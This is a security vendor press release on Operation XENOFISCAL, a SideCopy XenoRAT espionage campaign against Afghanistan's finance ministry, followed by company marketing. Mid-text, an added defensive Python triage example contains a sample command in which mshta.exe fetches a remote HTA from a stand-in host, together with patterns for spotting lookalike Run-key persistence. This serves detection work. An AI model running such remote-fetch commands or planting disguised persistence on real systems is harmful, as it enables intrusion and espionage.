
Seqrite Uncovers Operation XENOFISCAL: Pakistan-Linked SideCopy Group Deploys Persistent XenoRAT Against Afghanistan’s Ministry of Finance

Date: June 9, 2026

Pune, 05th June, 2026: A new chapter in South Asia’s cyber espionage story is unfolding far from the front page, inside finance ministries and provincial revenue offices. Seqrite, the enterprise security arm of Quick Heal Technologies Limited, a global provider of cybersecurity solutions, has disclosed details of Operation XENOFISCAL – a targeted cyber espionage campaign attributed with medium-to-high confidence to SideCopy, a Pakistan-linked advanced persistent threat (APT) group operating under the broader Transparent Tribe/APT36 umbrella.

Researchers at Seqrite Labs, India’s largest malware analysis facility, discovered that the operation implants a persistent variant of XenoRAT 1.8.7 across Afghanistan’s Ministry of Finance (MoF) and provincial revenue directorates, using carefully crafted Pashto-language spear-phishing lures and a multi-stage, largely fileless infection chain that abuses legitimate Windows binaries to bypass traditional defenses.

The campaign begins with a spear-phishing email carrying a ZIP archive that appears, at first glance, to be a routine internal document. Inside sits a malicious Windows shortcut (LNK) file whose Pashto filename translates to “List of Employees Who Were Introduced to the Intellectual and Psychological Warfare Seminar,” a theme carefully chosen to match Afghanistan’s government context and staff workflows. Once a targeted official executes the shortcut, the LNK abuses the legitimate Windows utility mshta.exe as a Living-off-the-Land Binary to silently fetch a remote HTML Application (HTA) from a compromised Afghan education domain, executing heavily obfuscated JavaScript directly in memory instead of writing obvious binaries to disk.

From there, the campaign escalates through multiple in-memory stages. A heavily obfuscated JScript payload reconstructs malicious components using hex-encoded arrays, custom Base64 routines, and .NET deserialization, ultimately loading a .NET DLL-based first-stage loader. While the victim is presented with a realistic decoy document – a detailed Afghan Ministry of Finance provincial staff directory listing finance directors, revenue chiefs, and mobile numbers for all 34 provinces – the loader stealthily creates a new directory under the Public user profile, establishes registry-based persistence under a typosquatted “Edgre” entry designed to mimic Microsoft Edge, and prepares the environment for the final payload.

In the last stage, the infection deploys XenoRAT 1.8.7, an open-source remote access trojan configured to communicate over TCP with attacker-controlled infrastructure hosted on European bulletproof servers, including the command-and-control IP 185.235.137.106. Once active, XenoRAT offers the operator a full post-exploitation toolkit, including remote command execution, dynamic DLL loading, file exfiltration, scheduled task creation, antivirus reconnaissance, SOCKS5 proxy tunneling, keystroke logging, screenshot capture, clipboard monitoring, webcam and microphone surveillance, and the ability to remove persistence traces or uninstall itself to erase evidence. By relying on staged, in-memory execution and trusted components such as mshta.exe, the operation leaves a minimal forensic footprint on disk while maintaining durable, high-value access to fiscal and personnel data inside Afghan government systems.
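Two stages of the chain described above leave telemetry that defenders can check for: mshta.exe being handed a remote URL, and Run-key persistence registered under a lookalike name such as "Edgre" pointing into the Public profile. The following is an added triage example, not code from Seqrite's report; the Sysmon-style event shapes, the domain name and the file paths are constructed assumptions.

```python
import re
from difflib import SequenceMatcher

# Constructed sample telemetry in a Sysmon-like shape (not from the report).
EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"mshta.exe https://compromised.example/lure.hta"},
    {"type": "process", "image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"mshta.exe C:\Program Files\Vendor\setup.hta"},  # local, benign
    {"type": "registry",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Edgre",
     "data": r"C:\Users\Public\Edgre\launcher.exe"},
    {"type": "registry",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "data": r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe"},
]

REMOTE_URL = re.compile(r"\bhttps?://", re.IGNORECASE)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?\\([^\\]+)$", re.IGNORECASE)
BRAND_NAMES = ("edge", "msedge", "microsoftedge")


def lookalike(name):
    """True when a Run value name resembles a Microsoft Edge name but is not one."""
    n = name.lower()
    if n in BRAND_NAMES:
        return False
    return any(SequenceMatcher(None, n, b).ratio() >= 0.8 for b in BRAND_NAMES)


def triage(events):
    """Return (rule, evidence) hits for the mshta and persistence stages."""
    hits = []
    for ev in events:
        if ev["type"] == "process" and ev["image"].lower().endswith("\\mshta.exe"):
            # mshta fetching an HTA over HTTP(S) is the LotL delivery step.
            if REMOTE_URL.search(ev["cmdline"]):
                hits.append(("mshta_remote_hta", ev["cmdline"]))
        elif ev["type"] == "registry":
            m = RUN_KEY.search(ev["key"])
            if not m:
                continue
            value_name = m.group(2)
            # Typosquatted brand name or a launcher under the Public profile.
            if lookalike(value_name) or "\\users\\public\\" in ev["data"].lower():
                hits.append(("run_key_persistence", ev["key"]))
    return hits
```

Run `triage(EVENTS)` to see only the remote-HTA launch and the "Edgre" Run value flagged; the local HTA and the genuine OneDrive entry pass.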

Researchers at Seqrite Labs noted that Operation XENOFISCAL is part of a broader regional pattern in which SideCopy and related clusters adopt customized open-source RATs, weaponize local-language lures, and stage infrastructure on foreign soil to complicate attribution. The campaign’s use of a compromised Afghan educational domain as a delivery platform, combined with a genuine MoF staff directory as the decoy document, underlines how much prior reconnaissance and data harvesting went into tailoring the operation for maximum credibility and impact.

For governments and critical institutions across the region, the implications stretch beyond endpoint compromise. Ministries of finance, tax authorities, and provincial revenue offices manage deeply sensitive data: national budgets, revenue flows, payroll, contracts, and extensive records on individual officials and vendors. Compromise at this layer is not only an intelligence coup; it can become a gateway for corruption, coercion, and strategic economic disruption. In India, where similar fiscal, identity and benefits data is central to governance, the Digital Personal Data Protection (DPDP) Act, 2023 raises the stakes further by placing clear accountability on Data Fiduciaries when personal data is exposed or misused through such intrusions.

In this environment, advanced cybersecurity solutions such as Seqrite Data Privacy and Digital Risk Protection Services (DRPS) have become must-have capabilities for government departments and enterprises that want to move beyond perimeter-centric security and truly protect what attackers are after – the data itself. Seqrite also offers a Digital Risks Calculator, which enables organizations to assess their potential exposure across digital assets, identify areas of elevated risk, and prioritize mitigation efforts. Used alongside Seqrite’s endpoint, server, and gateway protections, these help close the gap that campaigns like Operation XENOFISCAL systematically exploit: poorly inventoried, overexposed, and weakly governed information assets.

All Seqrite products are aligned with the provisions of the DPDP Act, allowing government and enterprise customers to strengthen cyber defense and data protection in tandem rather than as separate initiatives. Seqrite’s portfolio – from Endpoint and Server Security to Threat Intelligence and Ransomware Recovery as a Service (RRaaS) – is designed to give defenders both internal visibility and external situational awareness in the face of increasingly targeted, politically motivated operations.

About Quick Heal Technologies Limited

Quick Heal Technologies Ltd is a global cybersecurity solutions provider. Each Quick Heal product is designed to simplify IT security management across the length and depth of devices and on multiple platforms. They are customized to suit consumers, small businesses, government establishments, and corporate houses. Over a span of nearly three decades, the company’s R&D has focused on computer and network security solutions.

The current portfolio of cloud-based security and advanced machine learning-enabled solutions stops threats, attacks, and malicious traffic before they strike. This considerably reduces system resource usage. The security solutions are indigenously developed in India. Quick Heal Antivirus Solutions, Quick Heal Scan Engine, and the entire range of Quick Heal products are proprietary items of Quick Heal Technologies Ltd. Quick Heal recently unveiled AntiFraud.AI, India’s first fraud prevention solution, available for Android, iOS, and Windows. For more information, please visit www.quickheal.co.in; for AntiFraud.AI, visit www.quickheal.co.in/quick-heal-antifraud

About Seqrite

Seqrite is a leading enterprise cybersecurity solutions provider. With a focus on simplifying cybersecurity, Seqrite delivers comprehensive solutions and services through our patented, AI/ML-powered tech stack to protect businesses against the latest threats by securing devices, applications, networks, cloud, data, and identity. Seqrite is the Enterprise arm of the global cybersecurity brand, Quick Heal Technologies Limited, the only listed cybersecurity products and solutions company in India.

We are the first and only Indian company to have solidified India’s position on the global map by collaborating with the Govt. of the USA on its NIST NCCoE’s Data Classification project. We are differentiated by our easy-to-deploy, seamless-to-integrate comprehensive solutions providing the highest level of protection against emerging and sophisticated threats powered by state-of-the-art threat intelligence and playbooks backed by world-class service provided by best-in-class security experts at India’s largest malware analysis lab – Seqrite Labs. We are the only Indian full-stack company aligned with CSMA architecture recommendations, offering award-winning Endpoint Protection, Enterprise Mobile Device Management, Data Privacy, Zero Trust Network Access, and many more. Seqrite Data Privacy Management solution enables organizations to stay fully compliant with the DPDP Act and global regulations. We have recently launched Digital Risk Protection Services for external threat monitoring and Ransomware Recovery as a Service for rapid, guided restoration after ransomware attacks. Seqrite has also unveiled SIA, an LLM-powered security co-pilot built on GoDeep.AI to help enterprises navigate growing cyber complexity with intelligent, conversational analysis.

Today, 30,000+ enterprises in more than 70 countries trust Seqrite with their cybersecurity needs. For more information, please visit: www.seqrite.com